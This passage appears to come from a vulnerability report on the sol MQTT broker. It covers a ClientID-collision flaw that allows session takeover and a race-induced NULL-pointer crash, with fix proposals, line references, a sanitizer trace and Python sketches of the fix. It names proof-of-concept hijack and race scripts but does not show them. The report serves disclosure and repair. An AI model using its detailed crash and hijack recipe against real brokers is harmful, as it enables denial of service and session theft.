1. **Disconnect the existing client on ClientID collision (binding 3.1.1 [MQTT-3.1.4-2]).** In `connect_handler`, before `HASH_ADD_STR(server.clients_map, client_id, cc)` at `handlers.c:425`, perform a `HASH_FIND_STR(server.clients_map, cc->client_id, existing)`; if found and `existing != cc`, close its network connection and tear it down via the existing `client_deactivate()` path **before** adding the new client. MQTT 3.1.1 defines no server-to-client DISCONNECT packet, so closing the connection is the whole obligation; a DISCONNECT with Reason Code **0x8E "Session taken over"** (per v5.0 [MQTT-3.1.4-3]) would apply only if sol ever gains v5.0 support. This makes the long-standing "kick him out" comment at `handlers.c:390-393` finally true and removes the duplicate-key ambiguity entirely.

2. **Do not let two live connections share one `struct client_session` without synchronisation.** Either (a) disallow session reuse while a connection for that ClientID is still online (fail the second CONNECT or take it over atomically as above), or (b) give `struct client_session` its own `pthread_mutex_t` and require it for *every* mutation of `i_msgs[]` / `i_acks[]` / `inflights` / `next_free_mid`, including the publish path, the ack handlers (`puback`/`pubrec`/`pubcomp`), and the `inflight_msg_check` cron. Today the publish side holds only the global `mutex` while the ack side holds only `c->mutex` — there is no lock shared between the two colliding clients, which is the precise root cause of the crash.

3. **Close the locking asymmetry explicitly.** If a session-level lock is added, ensure the inflight-retry cron (`server.c:308-352`, which `HASH_ITER`s and so touches *both* colliding entries) and the ack handlers take it; today the cron's per-client `c->mutex` lock (`server.c:324`) does not serialise access to the shared session because the two colliding clients hold different `c->mutex` instances. Also move `pubrec_handler`'s `c->session->i_acks[pkt_id] = time(NULL)` (`handlers.c:817`) inside its `c->mutex` critical section, or under the new session lock, so it stops being a data race.

4. **Consider replacing the unguarded `HASH_ADD_STR` semantics.** Even after fix 1, an explicit "already-present" check before insertion is safer than relying on uthash's duplicate-key tolerance; it makes the routing table's single-winner invariant a code-level guarantee rather than a uthash-implementation detail (and pre-empts any future expansion-induced ordering surprise, where `HASH_EXPAND_BUCKETS` can reverse intra-bucket order and flip the winner).
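
The ordering suggested in items 1 and 4 can be modelled in a few lines of Python. This is only a sketch of the control flow: `clients_map`, `deactivate` and `register` are hypothetical stand-ins for `server.clients_map`, `client_deactivate()` and the insertion step in `connect_handler`, and the real fix would also have to close the socket and hold the appropriate locks.

```python
class Client:
    def __init__(self, client_id):
        self.client_id = client_id
        self.online = True


clients_map = {}          # stand-in for server.clients_map: one entry per ClientID


def deactivate(client):
    """Stand-in for client_deactivate(): mark offline and drop the map entry."""
    client.online = False
    if clients_map.get(client.client_id) is client:
        del clients_map[client.client_id]


def register(new_client):
    """Evict any live holder of the ClientID, then insert the new connection."""
    existing = clients_map.get(new_client.client_id)       # lookup before insert
    if existing is new_client:
        return                                             # already registered
    if existing is not None:
        deactivate(existing)                               # old connection goes first
    # Explicit single-winner guard, independent of the hash table's behaviour.
    assert new_client.client_id not in clients_map
    clients_map[new_client.client_id] = new_client


a = Client("victim-device-001")
b = Client("victim-device-001")
register(a)
register(b)
```

After both calls the map holds exactly one entry for the ClientID, it points at the newer connection, and the older one has been marked offline, so routing and cron iteration can no longer disagree about who owns the session.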

---

## References

- MQTT v3.1.1 specification, §3.1.4, normative statement **[MQTT-3.1.4-2]** — "If the ClientID represents a Client already connected to the Server then the Server MUST disconnect the existing Client." (OASIS MQTT Version 3.1.1.)
- MQTT v5.0 specification, §3.1.4 / normative table, statement **[MQTT-3.1.4-3]** — "...the Server sends a DISCONNECT packet to the existing Client with Reason Code of 0x8E (Session taken over) ... and MUST close the Network Connection of the existing Client." (local copy: `RFC/MQTT-v5.0.txt`, lines 4760-4765 and 12316-12324; reason-code definition at line 9211.)
- sol source (version 0.18.5), root `src/`:
  - `handlers.c:390-393` — dead "kick out" comment.
  - `handlers.c:400-405` — session lookup / HASH_DEL / session_present.
  - `handlers.c:416` — session-reuse branch (skips allocation).
  - `handlers.c:425` — unconditional duplicate-key `HASH_ADD_STR`.
  - `handlers.c:167` — `HASH_FIND_STR` first-match routing in `publish_message`.
  - `handlers.c:152, 189, 202-204, 216-218` — publish side guarded by global `mutex`.
  - `handlers.c:791-794, 803-820, 839-855` — ack handlers locking only `c->mutex` while mutating the shared session (note `pubrec`'s `i_acks` write at 817 sits outside its lock).
  - `handlers.c:309-311` — `set_connack` writes Session-Present at bit 0.
  - `sol_internal.h:225-244` — `struct client_session` with no mutex; `sol_internal.h:208` — `struct client` carries the mutex.
  - `server.c:308-352, 937` — inflight-retry cron, 20 s threshold, 1 s cadence, `HASH_ITER` over `clients_map`.
  - `server.c:319, 324` — cron `HASH_ITER` + per-client `c->mutex`.
  - `server.c:381-404` — `client_init` (sets `online=true` at 383, inits `c->mutex` at 403).
  - `server.c:412-446` — `client_deactivate` (clears `online` at 425, `HASH_DEL(clients_map)` at 441).
  - `server.h:39` — `THREADSNR = 2` default.
  - `ref.h:50-52` — `ref_dec` (the crash site).
  - `uthash.h:846-866` (HASH_FIND_IN_BKT, first match), `869-884` (HASH_ADD_TO_BKT, prepend), `951-973` (HASH_EXPAND_BUCKETS, order reversal).
  - `sol.c:62`, `README.md:8` — MQTT 3.1.1 self-identification; `CMakeLists.txt:4` — `VERSION 0.18.5`.
  - `config.c:368, 246-251` — `allow_anonymous=true` default.
- PoCs: `PLVerifier/buchi_verify_workspace/sol/MQTT_004/poc/{mqtt004_hijack.py, mqtt004_cron_race.py, mqtt004_race.py, poc_report.md}`.

---

## Appendix A — ASan/UBSan stack trace (verbatim)

Reproduced by running `sol_asan` (`-DDEBUG=ON`, ASan+UBSan) on `127.0.0.1:1884` and executing `mqtt004_cron_race.py`. UBSan fires first, then ASan:

```
handlers.c:793:5: runtime error: member access within null pointer of type 'struct mqtt_packet'
ERROR: AddressSanitizer: SEGV on unknown address 0x000000000080 (WRITE)
The signal is caused by a WRITE to memory with address #0x000000000080 with insufficient permissions.
 #0 0x... in ref_dec           src/ref.h:52
 #1 0x... in puback_handler    src/handlers.c:793        <- inflight_msg_clear(&c->session->i_msgs[pkt_id])
 #2 0x... in handle_command    src/handlers.c:879
 #3 0x... in process_message   src/server.c:867
 #4 0x... in read_callback     src/server.c:794
 #5 0x... in ev_process_event  src/ev.c:656
 #6 0x... in ev_run            src/ev.c:761
 #7 0x... in eventloop_start   src/server.c:940
 #8 0x... in start_server      src/server.c:1019
 #9 0x... in main              src/sol.c:128
SUMMARY: AddressSanitizer: SEGV src/ref.h:52 in ref_dec
==ABORTING==
```

**Root-cause characterisation of the `0x80` address:** the faulting pointer is `NULL`. The `i_msgs[pkt_id]` slot was already cleared by a prior `puback_handler` run (`handlers.c:794`, `c->session->i_msgs[pkt_id].packet = NULL`); a concurrent or duplicate PUBACK then re-enters `inflight_msg_clear` and calls `ref_dec` on that NULL packet. In the debug build, `&((struct mqtt_packet *)0)->refcount == 0x78`, and `struct ref { void (*free)(...); volatile atomic_int count; }` places `count` 8 bytes into the struct, at `0x78 + 8 == 0x80`. `ref_dec` (line 52) decrements `count`, i.e. it writes to `packet + 0x80`; with `packet == NULL` that write lands at address `0x80` in the zero page and raises SEGV.

The precise classification is therefore **a concurrent double-clear of a shared inflight slot that decrements the refcount of a NULL packet pointer**, producing a near-null-page write. "Use-after-free" is acceptable shorthand, but the exact root cause is the unprotected NULL slot in the shared session, which is why ASan reports a SEGV (DEADLYSIGNAL) rather than a heap-use-after-free.
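The offset arithmetic above can be checked with a small sketch. It mirrors only `struct ref` as quoted in this report, using Python's `ctypes`; the `0x78` offset of `refcount` inside `struct mqtt_packet` is taken from the report and not derived, and the names `Ref`, `REFCOUNT_OFFSET` and `fault_address` are illustrative and do not exist in sol. It assumes a 64-bit (LP64) platform, where a function pointer occupies 8 bytes.

```python
import ctypes


class Ref(ctypes.Structure):
    """Illustrative mirror of sol's `struct ref` as quoted in this report."""

    _fields_ = [
        ("free", ctypes.c_void_p),  # stands in for `void (*free)(...)`
        ("count", ctypes.c_int),    # stands in for `volatile atomic_int count`
    ]


# Offset of `refcount` within `struct mqtt_packet` in the debug build.
# Taken from the report as a given; the full packet struct is not modelled.
REFCOUNT_OFFSET = 0x78


def fault_address(packet_ptr: int) -> int:
    """Address touched when `packet->refcount.count` is decremented."""
    return packet_ptr + REFCOUNT_OFFSET + Ref.count.offset


if __name__ == "__main__":
    # With packet == NULL the write targets a small address in the zero page.
    print(hex(fault_address(0)))
```

On an LP64 build, `Ref.count.offset` is 8, so a NULL `packet` yields the `0x80` address seen in the trace. A non-NULL but freed `packet` would instead fault (or silently corrupt memory) at a heap address, which ASan would report as heap-use-after-free.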
